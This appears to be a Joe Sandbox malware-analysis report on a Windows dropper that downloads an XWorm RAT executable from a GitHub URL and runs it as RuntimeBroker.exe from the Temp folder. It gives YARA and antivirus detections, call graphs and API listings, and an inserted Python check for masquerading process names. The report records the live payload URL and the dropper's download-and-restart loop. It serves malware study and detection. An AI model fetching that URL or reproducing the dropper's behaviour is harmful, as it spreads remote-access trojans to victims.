                                                  Location: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe
                                                  Cache-Control: no-cache
                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                  X-Frame-Options: deny
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 0
                                                  Referrer-Policy: no-referrer-when-downgrade
                                                   2024-09-30 01:24:09 UTC  3382               IN         Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                   Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                   1           192.168.2.6  49712        185.199.111.133  443               4976  C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                   Timestamp                Bytes transferred  Direction  Data
                                                   2024-09-30 01:24:09 UTC  192                OUT        GET /errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe HTTP/1.1
                                                  User-Agent: ProgramDownloader
                                                  Cache-Control: no-cache
                                                  Host: raw.githubusercontent.com
                                                  Connection: Keep-Alive
                                                   2024-09-30 01:24:09 UTC  900                IN         HTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 49152
                                                  Cache-Control: max-age=300
                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                  Content-Type: application/octet-stream
                                                  ETag: "6a8de5595cd46d5bff74c4deaee2664415466391102022a2b649b3c3e913d3c7"
                                                  Strict-Transport-Security: max-age=31536000
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: deny
                                                  X-XSS-Protection: 1; mode=block
                                                  X-GitHub-Request-Id: 8322:30117F:A74F2B:B9BC60:66F9FDB9
                                                  Accept-Ranges: bytes
                                                  Date: Mon, 30 Sep 2024 01:24:09 GMT
                                                  Via: 1.1 varnish
                                                  X-Served-By: cache-nyc-kteb1890037-NYC
                                                  X-Cache: MISS
                                                  X-Cache-Hits: 0
                                                  X-Timer: S1727659450.779883,VS0,VE10
                                                  Vary: Authorization,Accept-Encoding,Origin
                                                  Access-Control-Allow-Origin: *
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  X-Fastly-Request-ID: 799bf73c92a11d27d12bad20d722a42b754e573a
                                                  Expires: Mon, 30 Sep 2024 01:29:09 GMT
                                                  Source-Age: 0
                                                   2024-09-30 01:24:09 UTC  1378               IN         Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL` @ @



                                                  Target ID:0
                                                  Start time:21:24:06
                                                  Start date:29/09/2024
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe"
                                                  Imagebase:0x7ff651790000
                                                  File size:30'208 bytes
                                                  MD5 hash:E40EB702F369E5DECFB33B3D78BD4B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:21:24:09
                                                  Start date:29/09/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                                                  Imagebase:0x610000
                                                  File size:49'152 bytes
                                                  MD5 hash:2C417B524AED1DA84F185711E5A478F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding base64-encoded APIs, command lines, registry keys, etc., Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 96%, ReversingLabs
                                                  • Detection: 72%, Virustotal, Browse
                                                  Reputation:low
                                                  Has exited:false
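The dropped file in Target ID 3 carries the name of a Windows system binary, RuntimeBroker.exe, but is started from the user's Temp directory. The check below is an added example written for this page, not code from the report or from Joe Sandbox: it resolves each image path (including `..` segments and mixed case) and flags any process whose image name belongs to a System32 binary but whose directory is not one Windows starts that binary from. The process records are constructed, modelled on the two processes listed above plus two controls; the name list and the expected directories are assumptions for the example and would come from a full inventory in a real rule.

```python
import ntpath

# Image names Windows installs under %SystemRoot%\System32. Illustrative subset (assumption
# for this example); a production rule loads the full inventory for the OS build.
SYSTEM32_IMAGE_NAMES = {
    "runtimebroker.exe", "svchost.exe", "dllhost.exe", "conhost.exe",
    "lsass.exe", "csrss.exe", "winlogon.exe", "taskhostw.exe",
}

# Directories those images are legitimately started from (normalised, lower case). Assumed set.
EXPECTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\winsxs",   # component store; servicing runs binaries from here
)


def normalise(path: str) -> str:
    """Collapse '.'/'..' segments, unify separators and case, so a path such as
    C:\\Windows\\System32\\..\\Temp\\x.exe is judged by where it really points."""
    return ntpath.normcase(ntpath.normpath(path))


def is_expected_location(image_path: str) -> bool:
    """True if the (resolved) directory of image_path is an expected System32-family directory."""
    directory = ntpath.dirname(normalise(image_path))
    return any(directory == d or directory.startswith(d + "\\") for d in EXPECTED_DIRS)


def find_masquerading(records):
    """records: iterable of dicts with 'target_id', 'image' (full path) and 'cmdline'.
    Returns the records whose image name is a System32 binary name but whose resolved
    directory is not one Windows would start it from, each with a 'reason' added."""
    hits = []
    for rec in records:
        resolved = normalise(rec["image"])
        name = ntpath.basename(resolved)
        if name in SYSTEM32_IMAGE_NAMES and not is_expected_location(rec["image"]):
            hits.append({**rec, "reason": f"{name} started from {ntpath.dirname(resolved)}"})
    return hits


# Constructed sample: Target ID 0 and 3 from this report, a genuine RuntimeBroker.exe, and a
# path that hides a Temp directory behind a System32 prefix.
SAMPLE_PROCESSES = [
    {"target_id": 0,
     "image": r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe",
     "cmdline": r'"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe"'},
    {"target_id": 3,
     "image": r"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"},
    {"target_id": 4,
     "image": r"C:\Windows\System32\RuntimeBroker.exe",
     "cmdline": r"C:\Windows\System32\RuntimeBroker.exe -Embedding"},
    {"target_id": 5,
     "image": r"C:\Windows\System32\..\Temp\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for hit in find_masquerading(SAMPLE_PROCESSES):
        print(f"Target ID {hit['target_id']}: {hit['reason']}")
```

The dropper itself (Target ID 0) is not flagged by this rule, since its name is not a system binary name; it is the dropped RuntimeBroker.exe and the `..`-disguised svchost.exe that match. Normalising before comparing matters because a raw string prefix check on `C:\Windows\System32\` would pass the fourth record.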


                                                    Execution Graph

                                                    Execution Coverage:16.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:15.9%
                                                    Total number of Nodes:383
                                                    Total number of Limit Nodes:5
execution_graph, listed by function (node addresses and the API calls the report records on them; the interactive node/edge rendering of the original is not reproduced):
• 7ff6517936d4 (CRT entry sequence): __scrt_acquire_startup_lock (7ff6517936f0), __scrt_release_startup_lock (7ff65179370e), _register_thread_local_exe_atexit_callback (7ff6517937b1), memset and GetStartupInfoW (7ff651793e4c), _get_narrow_winmain_command_line (7ff6517937be), _exit (7ff65179383d); calls 7ff651793d04 and then 7ff651791b60
• 7ff651793d04: IsProcessorFeaturePresent; memset, RtlCaptureContext, RtlLookupFunctionEntry (7ff651793d38); RtlVirtualUnwind (7ff651793d72); memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter (7ff651793dae)
• 7ff651791b60: calls 7ff651791a00
• 7ff651791a00, loop head at 7ff651791a40: OpenProcess (7ff651791a4c), GetExitCodeProcess (7ff651791a61), CloseHandle (7ff651791a75, 7ff651791a8f), GetFileAttributesW (7ff651791a95), CreateProcessW (7ff651791ac4), CloseHandle CloseHandle (7ff651791b2f), SleepEx (7ff651791b4c). The loop head branches to GetFileAttributesW, OpenProcess, CreateProcessW, SleepEx and to 7ff6517916c0, and every path returns to the loop head; i.e. the process polls the child, re-fetches the payload and restarts it.
• 7ff6517916c0 (download to file): InternetOpenW (7ff6517916e2, reached via 7ff6517942c0), InternetOpenUrlW (7ff65179171e), InternetCloseHandle (7ff65179175d) on failure, 7ff651792c60 to open the output stream, InternetReadFile (7ff6517917e8) with ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J and InternetReadFile in the read loop (7ff651791818), ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N (7ff651791855), InternetCloseHandle InternetCloseHandle (7ff651791874 and 7ff6517917d2), 7ff651792ba0 to close the file, ??1?$basic_streambuf ??1?$basic_ostream ??1?$basic_ios destructors (7ff6517918f4), 7ff651793320 before returning to 7ff651791a40
• 7ff651792c60 (open output stream): ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH; then _get_stream_buffer_pointers, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 (7ff651792d45), ?setstate (7ff651792e1b), ?always_noconv@codecvt_base@std@ (7ff651792dd1); calls 7ff651792e60
• 7ff651792e60 (locale facet lookup): ??0_Lockit@std@@QEAA@H, ??Bid@locale@std@, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 (7ff651792ed9), ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ (7ff651792efc), ??1_Lockit@std@@QEAA (7ff651792f37), 7ff6517932c8 → 7ff651793340 to allocate the facet; on failure 7ff651791330 → 7ff651791300 → _CxxThrowException __std_exception_copy (7ff65179133e)
• 7ff651791000: calls 7ff651792840, then 7ff6517913c0; _invalid_parameter_noinfo_noreturn (7ff651791061), free (7ff6517935bc)
• 7ff6517913c0: GetUserNameW, then 7ff651792840 (22 API calls), memmove (7ff651791523, 7ff651791583), 7ff651793340 for malloc, 7ff6517930e0, ?_Xlength_error@std@@YAXPEBD (via 7ff6517912e0), Concurrency::cancel_current_task __std_exception_copy (via 7ff651791240), _invalid_parameter_noinfo_noreturn (7ff651791634, 7ff651791670), free, 7ff651793320 (8 API calls)
• 7ff651791080: calls 7ff651792840 (22 API calls)
• 7ff651792840, 7ff6517930e0, 7ff651792f70 (string growth helpers): memmove, malloc via 7ff651793340, free, ?_Xlength_error@std@@YAXPEBD, Concurrency::cancel_current_task, __std_exception_copy, _invalid_parameter_noinfo_noreturn; 7ff651792840 additionally ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA (7ff651792a3e) and 7ff651792ba0
• 7ff651793340: malloc (7ff65179335a) in a retry loop; on exhaustion 7ff6517939fc → 7ff6517939dc → _CxxThrowException (7ff651793a0a), or 7ff651791240
• 7ff651791240: Concurrency::cancel_current_task (7ff65179124e), __std_exception_copy (7ff65179125f)
• 7ff651792ba0 and 7ff651792ab0 (close file): ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ (7ff651792c17), ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD (7ff651792af6), fwrite (7ff651792b57), fclose (7ff651792bf1), 7ff651793320
• 7ff651793320 (security cookie check, failure path 7ff651793894 → 7ff651793968 → 7ff651793860): IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
• 7ff651793848 → 7ff651793f5c: GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (7ff651793f7f)
• 7ff6517935f0: 7ff6517933f4 (__scrt_release_startup_lock, _initialize_onexit_table, 7ff651793d04), _RTC_Initialize (7ff651793624), InitializeSListHead (7ff651794010), 7ff651793d04
• 7ff6517937fc: GetModuleHandleW (7ff651793e94), _exit (7ff65179383d)
• 7ff6517936b8: SetUnhandledExceptionFilter (7ff651793ee8)
• 7ff651793ef8, 7ff6517935c4, 7ff6517927d0, 7ff651794460, 7ff6517945ac and 7ff6517911a0 (__std_exception_destroy): free, with _invalid_parameter_noinfo_noreturn on the error branch where present
• stream buffer overrides: 7ff651791f00 (?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J, memmove, fwrite), 7ff651791fd0 (?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J, memmove, fread), 7ff651792560 (fputc, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD, fwrite), 7ff651792120 (fgetc, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD, memmove, ungetc, free, 7ff651792f70), 7ff651792470 (ungetc), 7ff651791df0 (_fseeki64, fgetpos), 7ff651791d10 (fsetpos), 7ff651791c10 (setvbuf, ?_Init@?$basic_streambuf, _get_stream_buffer_pointers), 7ff651791bc0 (fflush), 7ff651792740 (_lock_file), 7ff651792720 (_unlock_file)
• stream destructors: 7ff651792760 (??1?$basic_streambuf, then 7ff651792ba0), 7ff651792a70 → 7ff651791940 (??1?$basic_streambuf ??1?$basic_ostream ??1?$basic_ios, then 7ff651792ba0), 7ff6517943b0 (??1?$basic_ios), 7ff6517943de (??1?$basic_ostream), 7ff651794410 (??1_Lockit@std@@QEAA)
• 7ff651794442: _seh_filter_exe; 7ff651794228: __GSHandlerCheckCommon, __CxxFrameHandler4; 7ff651791140: __std_exception_copy; 7ff6517911f0: __std_exception_destroy

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
callgraph (109 functions; caller → callees as recorded, Function_ prefix omitted after the first mention):
• Function_00007FF6517936D4 → 7FF6517933B8, 7FF651793D04, 7FF651793518, 7FF65179353C, 7FF651793E4C, 7FF651791B60, 7FF651794064, 7FF65179405C, 7FF651793480, 7FF65179337C, 7FF651793E94
• 7FF651791B60 → 7FF651791A00, 7FF651792E60
• 7FF651791A00 → 7FF6517916C0
• 7FF6517916C0 → 7FF6517942C0, 7FF651793320, 7FF651792C60, 7FF651792BA0
• 7FF651792C60 → 7FF651793320, 7FF651792E60
• 7FF651792E60 → 7FF6517932C8, 7FF651793320, 7FF651791330
• 7FF651791330 → 7FF651791300
• 7FF651792BA0 → 7FF651792AB0; 7FF651792AB0 → 7FF651793320
• 7FF651791000 → 7FF6517913C0, 7FF6517935BC, 7FF651792840, 7FF651793568
• 7FF6517913C0 → 7FF6517935BC, 7FF6517912E0, 7FF6517930E0, 7FF651793320, 7FF651793340, 7FF651791240, 7FF651792840
• 7FF651792840 → 7FF6517935BC, 7FF6517912E0, 7FF651793340, 7FF651791240, 7FF651792BA0
• 7FF6517930E0 and 7FF651792F70 → 7FF6517935BC, 7FF6517912E0, 7FF651793340, 7FF651791240
• 7FF651791080 → 7FF651792840, 7FF651793568
• 7FF651793340 → 7FF6517939FC, 7FF651791240; 7FF6517939FC → 7FF6517939DC; 7FF651791240 → 7FF651791210
• 7FF6517932C8 → 7FF651793340
• 7FF651793320 → 7FF651793860, 7FF651793968
• 7FF6517935F0 → 7FF6517933F4, 7FF651793CE8, 7FF651793D04, 7FF651794010, 7FF651794008, 7FF651794020, 7FF651794034, 7FF651794050, 7FF65179385C, 7FF65179406C, 7FF651793E90, 7FF651793E88, 7FF6517935A4
• 7FF6517933F4 → 7FF651793CF0, 7FF651793D04; 7FF651793D04 → 7FF651793CFC; 7FF6517933B8 → 7FF651794020, 7FF651793A1C; 7FF6517936B8 → 7FF651793EE8, 7FF651793E90; 7FF6517937FC → 7FF651793E94; 7FF651793848 → 7FF651793F5C; 7FF651793518 and 7FF65179337C → 7FF651793CF0; 7FF65179353C → 7FF651794020; 7FF651794034 → 7FF651794024, 7FF65179402C; 7FF6517935A4 → 7FF651793568; 7FF651794228 and 7FF6517941AC → 7FF6517941CC
• stream functions: 7FF651791DF0 and 7FF651791D10 → 7FF651793320, 7FF651792AB0; 7FF651791C10 and 7FF651792560 → 7FF651793320; 7FF651792120 → 7FF6517935BC, 7FF651793320, 7FF651792F70; 7FF651792760 and 7FF651791940 → 7FF651792BA0; 7FF651792A70 → 7FF6517935BC, 7FF651791940
• callers whose only callee is 7FF6517935BC: 7FF6517935C4, 7FF6517944D0, 7FF6517927D0, 7FF651794540, 7FF651794460, 7FF6517911A0, 7FF6517945AC
• functions with no outgoing edges: 7FF6517942C0, 7FF651791BC0, 7FF6517935BC, 7FF651791FD0, 7FF6517941CC, 7FF6517943DE, 7FF6517912E0, 7FF6517939DC, 7FF6517943F0, 7FF6517911F0, 7FF651793CF0, 7FF651793EE8, 7FF651793CE8, 7FF651791F00, 7FF651792400, 7FF651791300, 7FF651794400, 7FF651793EF8, 7FF651793CFC, 7FF651794410, 7FF651794010, 7FF651791210, 7FF651793511, 7FF651794008, 7FF65179441E, 7FF651792720, 7FF651794020, 7FF651794024, 7FF651793A1C, 7FF65179442A, 7FF65179402C, 7FF651791140, 7FF651792740, 7FF651794442, 7FF651794050, 7FF651793E4C, 7FF651793860, 7FF651794360, 7FF651794064, 7FF651793F5C, 7FF65179385C, 7FF65179405C, 7FF651792470, 7FF651793968, 7FF651793568, 7FF65179406C, 7FF65179436C, 7FF651791180, 7FF651793480, 7FF651794380, 7FF651791390, 7FF651793E90, 7FF651794390, 7FF651793E94, 7FF651793E88, 7FF6517912A0, 7FF6517943A0, 7FF6517943B0, 7FF6517932B4, 7FF6517940A8

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
• Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseD@std@@@std@@HandleU?$char_traits@$FileOpenRead$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@?setstate@?$basic_ios@?write@?$basic_ostream@V12@
                                                    • String ID: ProgramDownloader
                                                    • API String ID: 3000614519-2978029317
                                                    • Opcode ID: 9b4171f253dd89bc2f4e8e56ac116c2dcbdf496e5238893e0a2f42cba29b3923
                                                    • Instruction ID: 9a711ab5f920926c81d9e349171a4eb28d96c3f0fed7f43442c8a7cd882dc988
                                                    • Opcode Fuzzy Hash: 9b4171f253dd89bc2f4e8e56ac116c2dcbdf496e5238893e0a2f42cba29b3923
                                                    • Instruction Fuzzy Hash: 74716372B18B5686EB10CF29E4A47A977B0FB85B54F884032DA4D93B69DF3CD549CB00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
control_flow_graph of 7ff6517913c0 (basic blocks in address order with the call recorded in each; → lists the successor blocks):
• 7ff6517913c0-7ff65179141d GetUserNameW → 7ff65179141f, 7ff651791426
• 7ff65179141f → 7ff651791426
• 7ff651791426-7ff651791445 call 7ff651792840 → 7ff65179144b, 7ff6517916b2
• 7ff65179144b-7ff651791489 → 7ff65179148f, 7ff651791523
• 7ff65179148f-7ff651791499 → 7ff65179149b, 7ff6517914e1
• 7ff65179149b-7ff6517914a8 → 7ff6517914ac
• 7ff6517914ac-7ff6517914b3 → 7ff6517914b5, 7ff65179150d
• 7ff6517914b5-7ff6517914bc → 7ff6517914c2, 7ff6517916ac
• 7ff6517914c2-7ff6517914cd call 7ff651793340 → 7ff6517914d3, 7ff651791634
• 7ff6517914d3-7ff6517914df → 7ff651791515
• 7ff6517914e1-7ff6517914fe → 7ff651791504, 7ff6517916ac
• 7ff651791504-7ff651791507 → 7ff6517914ac, 7ff651791509
• 7ff651791509-7ff65179150b → 7ff65179151e
• 7ff65179150d-7ff651791512 call 7ff651793340 → 7ff651791515
• 7ff651791515-7ff65179151a → 7ff65179151e
• 7ff65179151e → 7ff651791523
• 7ff651791523-7ff651791563 memmove → 7ff651791565, 7ff651791569
• 7ff651791565 → 7ff651791569
• 7ff651791569-7ff651791581 → 7ff651791583, 7ff6517915bc
• 7ff651791583-7ff6517915ba memmove → 7ff6517915d0
• 7ff6517915bc-7ff6517915ce call 7ff6517930e0 → 7ff6517915d0
• 7ff6517915d0-7ff651791604 → 7ff651791606, 7ff651791641
• 7ff651791606-7ff65179161d → 7ff65179161f, 7ff65179163b
• 7ff65179161f-7ff651791632 → 7ff651791634, 7ff65179163b
• 7ff651791634-7ff65179163a _invalid_parameter_noinfo_noreturn → 7ff65179163b
• 7ff65179163b-7ff651791640 call 7ff6517935bc → 7ff651791641
• 7ff651791641-7ff651791645 → 7ff651791647, 7ff65179167f
• 7ff651791647-7ff651791659 → 7ff65179165b, 7ff651791677
• 7ff65179165b-7ff65179166e → 7ff651791670, 7ff651791677
• 7ff651791670-7ff651791676 _invalid_parameter_noinfo_noreturn → 7ff651791677
• 7ff651791677-7ff65179167a call 7ff6517935bc → 7ff65179167f
• 7ff65179167f-7ff6517916ab call 7ff651793320 (function exit)
• 7ff6517916ac-7ff6517916b1 call 7ff651791240 → 7ff6517916b2
• 7ff6517916b2-7ff6517916b7 call 7ff6517912e0 (no successor)
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturnmemmove$Concurrency::cancel_current_taskNameUsermalloc
                                                    • String ID:
                                                    • API String ID: 2791147819-0
                                                    • Opcode ID: e0a027a790e6d81c1cc841c0ede4b6693aa2e5a3c244eea9489b0198a93938e3
                                                    • Instruction ID: 4abbe1952fe60823f0fc13400309384847af0406a70d20cf11b61f774b780575
                                                    • Opcode Fuzzy Hash: e0a027a790e6d81c1cc841c0ede4b6693aa2e5a3c244eea9489b0198a93938e3
                                                    • Instruction Fuzzy Hash: 7B81B562F18B4191EB10DB29E4542AD6360FB58BB4F584332EA6D937DADF7CE198C340

                                                    APIs
                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF651792C9D
                                                    • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF651792CBC
                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF651792CEE
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF651792D09
                                                    • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF651792D33
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF651792D50
                                                    • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF651792D77
                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF651792DC2
                                                      • Part of subcall function 00007FF651792E60: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF651792E8D
                                                      • Part of subcall function 00007FF651792E60: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF651792EA7
                                                      • Part of subcall function 00007FF651792E60: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF651792ED9
                                                      • Part of subcall function 00007FF651792E60: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF651792F04
                                                      • Part of subcall function 00007FF651792E60: std::_Facet_Register.LIBCPMT ref: 00007FF651792F1D
                                                      • Part of subcall function 00007FF651792E60: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF651792F3C
                                                    • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF651792DD7
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF651792DEE
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF651792E2D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                    • String ID:
                                                    • API String ID: 3067465659-0
                                                    • Opcode ID: 70ab79a1403d5315265d0810cb3557e94bf044a389665fcccea069b5cdcf3fa9
                                                    • Instruction ID: 943866e440d2007710e818e395da53d9bae5632b5dae80e36c91cb47c0052940
                                                    • Opcode Fuzzy Hash: 70ab79a1403d5315265d0810cb3557e94bf044a389665fcccea069b5cdcf3fa9
                                                    • Instruction Fuzzy Hash: 4A516B3260AF8586EB50CF29E86436977A4FB49F88F584036DA8E93729DF3CD459C740

                                                    Memory Dump Source
